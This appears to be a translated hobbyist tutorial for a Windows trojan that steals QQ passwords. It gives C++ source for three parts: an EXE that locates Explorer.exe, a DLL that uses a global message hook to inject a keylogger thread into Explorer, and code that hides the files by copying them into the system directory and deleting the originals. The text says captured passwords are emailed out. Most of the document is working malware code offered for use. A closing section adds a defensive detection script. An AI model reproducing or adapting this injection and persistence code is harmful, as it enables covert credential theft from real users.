If you read my
Before we get into the code, let's look at a few prerequisites. First, we have to understand one fact: how do you get into another process's memory space? In other words, how do you make the function that does the work run inside another program? The most standard approach is a system-level hook! If the hook procedure lives in a DLL, its reach grows: you can interfere with the normal work of other processes! Second, memory-mapped files! By mapping a shared section, different processes can share data and treat it as part of their own address space. I don't use a shared data segment, because the data has to stay consistent across several DLLs and an EXE, and I find a memory map more convenient!
Now let me describe the layout of the program. It has three project files: Winexe.exe, install.dll and getKey.dll. 1. Winexe.exe loads install.dll when it runs. 2. Install.dll contains a helper function that injects GetKey.dll into the target process; in this program the target is Explorer.exe. At that point getKey.dll can do whatever it likes :) (set the hook, capture keystrokes, send mail). Is it a bit like a Trojan horse? Of course, there are a few small details that make Winexe.exe and install.dll disappear from memory: press [Ctrl Alt Delete] and you will not find a Winexe.exe process, and with a process viewer you can see that getKey.dll has become part of the Explorer.exe process. That's all ~~!
Maybe you will ask: why not use Winexe to put getKey into the other process directly?
That doesn't work, because Winexe and Explorer.exe are different processes and ordinarily cannot reach into each other! So I use an intermediary (Install.dll) to inject getKey.dll into Explorer.exe. Is it a bit like a rocket carrying a probe into space? Haha, enough talk! I'll explain with an illustration: Figure 1
That is the main idea; now let's get into the code, following the illustration! Remember: our ultimate goal is to get into Explorer ~~ First we find the process we need to inject in the system snapshot (if it isn't there, go away, hee hee). The following code walks the snapshot to find the process ID of Explorer.exe (you can choose another target). In Winexe we mainly collect three pieces of data: the target process ID, the window handle of Winexe.exe, and the path where Winexe is currently located. What is the handle for? Hee hee ~~ Some might say Winexe's handle is meaningless, but don't forget the memory map I introduced; once that comes into play the situation is different! And what is the path for? Very simple: no matter where the program is run from, it has only one home, which is to move itself to the system directory! Remember, this path is preparation for that, and for the suicide! Hey ~~ That's right ~!
DWORD CWinExeDlg::FindProcessId()
{
    DWORD dwId = 0;
    HANDLE m_Handle = ::CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
    PROCESSENTRY32 *info = new PROCESSENTRY32;
    info->dwSize = sizeof(PROCESSENTRY32);
    BOOL bFind = Process32First(m_Handle, info);
    while (bFind)
    {
        CString strBigWrite;
        strBigWrite = info->szExeFile;
        strBigWrite.MakeUpper();                 // compare case-insensitively
        if (strBigWrite.Find("EXPLORER.EXE") != -1)
        {
            dwId = info->th32ProcessID;
            bFind = FALSE;
            break;
        }
        bFind = Process32Next(m_Handle, info);
    }
    delete info;
    info = NULL;
    CloseHandle(m_Handle);
    return dwId;
}
The path and handle are easy to get, and these three pieces of information are passed into install.dll! Install.dll is a processing plant that turns the raw material it is sent into a product! Before entering install.dll, let's look at what equipment it has. :)
The following structure and a shared data segment amount to the same thing! However, my shared data is a structure variable, ready to record the shared information!
typedef struct _INSTALLINFO
{
    char  m_cPath[256];        // path
    DWORD m_dwExplorerId;      // :) is it still used?
    DWORD m_dwGetKeyThreadId;  // take a look after CreateThread
    HWND  m_hWnd;              // records the handle of Winexe
} INSTALLSHAREDATA;
Having seen the equipment, let's see how it processes the raw materials. First put the raw materials into the device (corresponding to the structure above):
void InstallInfo(char cPath[], HWND hWnd, DWORD dwPrId)
{
    // memset((INSTALLSHAREDATA *)lpInMem, 0, sizeof(INSTALLSHAREDATA));
    pInShare->m_dwExplorerId = dwPrId;
    pInShare->m_hWnd = hWnd;
    pInShare->m_dwGetKeyThreadId = 0;
    strcpy(pInShare->m_cPath, cPath);
    if (hInHookMsg == NULL)
        hInHookMsg = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hInstance, NULL);
}
Oh, did you see it? I used a hook! This hook's role: whenever GetMessage takes a message from a queue, the hook procedure runs before the message is processed! Let's see what this hook does, and how getKey gets injected into Explorer.exe.
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode >= 0)
    {
        if (pInShare->m_dwExplorerId != 0 && GetCurrentProcessId() == pInShare->m_dwExplorerId)
        {
            pInShare->m_dwExplorerId = 0; // no longer need to monitor the Explorer process
            CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OperateThreadPro, NULL, 0, &(pInShare->m_dwGetKeyThreadId));
        }
    }
    return CallNextHookEx(hInHookMsg, nCode, wParam, lParam);
}
Some people will say that GetCurrentProcessId() can never equal pInShare->m_dwExplorerId, so how could the check ever pass while m_dwExplorerId is non-zero? Ordinarily that is true: GetCurrentProcessId() returns the Winexe process ID, so how could it equal Explorer's? I checked this under the debugger and wrote the comparison result to a file, and indeed they were not equal! But the base address of the memory map is assigned to the structure variable at the DLL entry point (DllMain), sigh ~~~ To put it bluntly, the mapped view is handed to the structure pointer there! Hey ~~ This way they can become equal: by the time this hook procedure runs, GetCurrentProcessId() is no longer Winexe's ID, because the DLL has entered Explorer's address space! Reader, note: look at the CreateThread function. What is its consequence? Oh ~~ a new thread is created inside Explorer! Now let's lock our eyes on the global thread function OperateThreadPro and see what it does!!!
DWORD WINAPI OperateThreadPro(LPVOID pParam)
{
    typedef void (WINAPI *FUN)();
    HMODULE hModule;
    FUN InstallGetKey;
    char cSysPath[256];
    ::GetSystemDirectory(cSysPath, 256);
    strcat(cSysPath, "\\getkey.dll");
    hModule = LoadLibrary(cSysPath);                          // system directory
    InstallGetKey = (FUN)GetProcAddress(hModule, "InstallGetKey");
    if (InstallGetKey != NULL)
    {
        InstallGetKey();   // the current thread does not end here, see below
    }
    else                   // this rarely happens!
    {
        FreeLibrary(hModule);
        return 0;
    }
    return 0;
}
Hey, how about it, did you see it? The key point is dynamically calling getKey.dll, isn't it?! What, you already knew? Then I wasted your time? 5555 :( Having loaded the DLL dynamically, we naturally call the key function inside it: InstallGetKey(). Now we only care about getKey.dll, don't we? The raw material has been processed into a product; now to find a buyer! What? You won't sell? Society today has too few people like that! :( (leave your phone number ~~ I want to do an interview ~~)
Note: this InstallGetKey() is an exported function, otherwise the thread above fails with an undefined symbol! getKey.dll also contains a structure, as follows:
typedef struct _INSTALLINFO
{
    char  m_cPath[256];
    DWORD m_dwExplorerId;
    DWORD m_dwGetKeyThreadId;
    HWND  m_hWnd;
} INSTALLSHAREDATA;
What's this? The same as the previous definition?! To share it, don't you have to write a few more lines and give it an initial value? Oh, isn't the handle of Winexe already mapped in here?! And how do you get the EXE's path? You don't have it? Don't be anxious, don't hurry, read on! :)
I'm posting this function in full! So long, so much bother, huh!!
void InstallGetKey()
{
    HANDLE h = OpenFileMapping(FILE_MAP_WRITE | FILE_MAP_READ, FALSE, _T("MemNameInstall"));
    if (h != 0)
    {
        LPVOID p = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);
        p_data = (INSTALLSHAREDATA *)p;
        if (p != NULL)
        {
            ::PostMessage(p_data->m_hWnd, WM_GOODLOOK, 1, 1); // send the suicide command to the EXE
            Sleep(100); // wait 100 milliseconds, this is key! the EXE's suicide takes a little time ^_^
            // after the EXE process exits, copy install.dll and the exe into the system directory
            // and then delete the files in the current directory!
            char csExePath[256]; // source EXE path
            char csDllPath[256]; // source install.dll path
            char cdExePath[256]; // destination EXE path
            char cdDllPath[256]; // destination DLL path
            strcpy(csExePath, p_data->m_cPath); // current directory
            strcpy(csDllPath, p_data->m_cPath);
            strcat(csExePath, "\\winexe.exe");  // with file name
            strcat(csDllPath, "\\install.dll");
            ::GetSystemDirectory(cdExePath, 256); // system directory
            ::GetSystemDirectory(cdDllPath, 256);
            strcat(cdExePath, "\\winexe.exe");
            strcat(cdDllPath, "\\install.dll");
            if (strcmp(cdExePath, csExePath) != 0)
            {
                CopyFile(csExePath, cdExePath, FALSE);
                if (!::DeleteFile(csExePath))
                {
                    ofstream fs;
                    fs.open("D:\\_Error_1.txt", ios::app);
                    fs << "Error code = " << GetLastError() << endl;
                    fs.close();
                }
            }
            if (strcmp(cdDllPath, csDllPath) != 0)
            {
                CopyFile(csDllPath, cdDllPath, FALSE);
                if (!::DeleteFile(csDllPath))
                {
                    ofstream fd;
                    fd.open("D:\\_Error_2.txt", ios::app);
                    fd << "Error code = " << GetLastError() << endl;
                    fd.close();
                }
            }
            UnmapViewOfFile(p); // unmap only after the last read through p_data
        }
        CloseHandle(h);
    }
    MSG msg;
    SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc);
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    // ExitThread(0); // exit the thread (if you really exit, remember to unhook)
}
How about it? This function is still not complicated! Ha ha! I have commented it in detail, I believe you can understand it!
Let me put it simply:
1. PostMessage(p_data->m_hWnd, WM_GOODLOOK, 1, 1) tells Winexe to commit suicide! Once Winexe receives WM_GOODLOOK, that proves the injection is complete; Winexe is no longer useful, and what is useless dies. So cruel!
2. SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc) issues the TIMER events that start the surveillance work; this part differs little from the 1.0 version!
3. Don't forget, this function runs in an auxiliary thread, and a thread function ends in one of two ways: it ends itself, which is the safe ending; or the process ends and it is terminated unconditionally! Here we cannot let it end, so I use a message loop to keep it alive! Of course, if you want to end it, you can define a global variable in the memory-mapped structure, check that value when install.dll loads getKey.dll, and judge from it whether the thread has ended. If it has not ended and you want to end it, send a message; but sending this message takes a bit of art, you have to use a system broadcast: SendMessage(HWND_BROADCAST, WM_YOURDEFINE, 0, 0), and add a check for it in the message loop above. That's it!
At this point the program is essentially done! The rest is the same as the flow in the 1.0 version: set the hook -> find the QQ window -> capture keystrokes -> record the password -> send once for every five QQ numbers! If you see any flaws, please tell me! ^_^
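Seen from the defender's side, the hook-based injection described above and the self-relocation into the system directory leave one combined footprint: a module written under the system directory by something other than an installer, then mapped into explorer.exe. The following Python is an added example by the editor, not code from this post; it correlates constructed Sysmon-style FileCreate and ImageLoad records (field names and the trusted-writer list are assumptions) to flag that pattern.

```python
from dataclasses import dataclass

SYSTEM_DIR = r"c:\windows\system32"
# Processes expected to drop files under the system directory (assumed list).
TRUSTED_WRITERS = {
    r"c:\windows\servicing\trustedinstaller.exe",
    r"c:\windows\system32\msiexec.exe",
}

@dataclass(frozen=True)
class Event:
    seq: int             # order in which the sensor saw the event
    kind: str            # "FileCreate" or "ImageLoad"
    process: str         # image path of the process that produced the event
    target: str          # file written (FileCreate) or module mapped (ImageLoad)
    signed: bool = True  # Authenticode status of a loaded module

def suspicious_loads(events):
    """Return (module, writer, loader) for every module that was dropped under
    the system directory by an untrusted process and later mapped into
    explorer.exe without a valid signature."""
    dropped = {}   # normalised module path -> process that wrote it
    hits = []
    for ev in sorted(events, key=lambda e: e.seq):
        path = ev.target.lower()
        proc = ev.process.lower()
        if ev.kind == "FileCreate":
            if path.startswith(SYSTEM_DIR) and proc not in TRUSTED_WRITERS:
                dropped[path] = ev.process
        elif ev.kind == "ImageLoad" and proc.endswith(r"\explorer.exe"):
            if path in dropped and not ev.signed:
                hits.append((path, dropped[path], ev.process))
    return hits

# Constructed sample, not real telemetry: a dropper writes getkey.dll into
# System32 and explorer.exe later loads it; a signed shell extension installed
# by msiexec is the benign control case.
SAMPLE_EVENTS = [
    Event(1, "FileCreate", r"C:\Users\u\Desktop\winexe.exe",
          r"C:\Windows\System32\getkey.dll"),
    Event(2, "FileCreate", r"C:\Windows\System32\msiexec.exe",
          r"C:\Windows\System32\vendor_shell.dll"),
    Event(3, "ImageLoad", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\vendor_shell.dll", signed=True),
    Event(4, "ImageLoad", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\getkey.dll", signed=False),
]

if __name__ == "__main__":
    for module, writer, loader in suspicious_loads(SAMPLE_EVENTS):
        print(f"ALERT: {loader} loaded {module}, written earlier by {writer}")
```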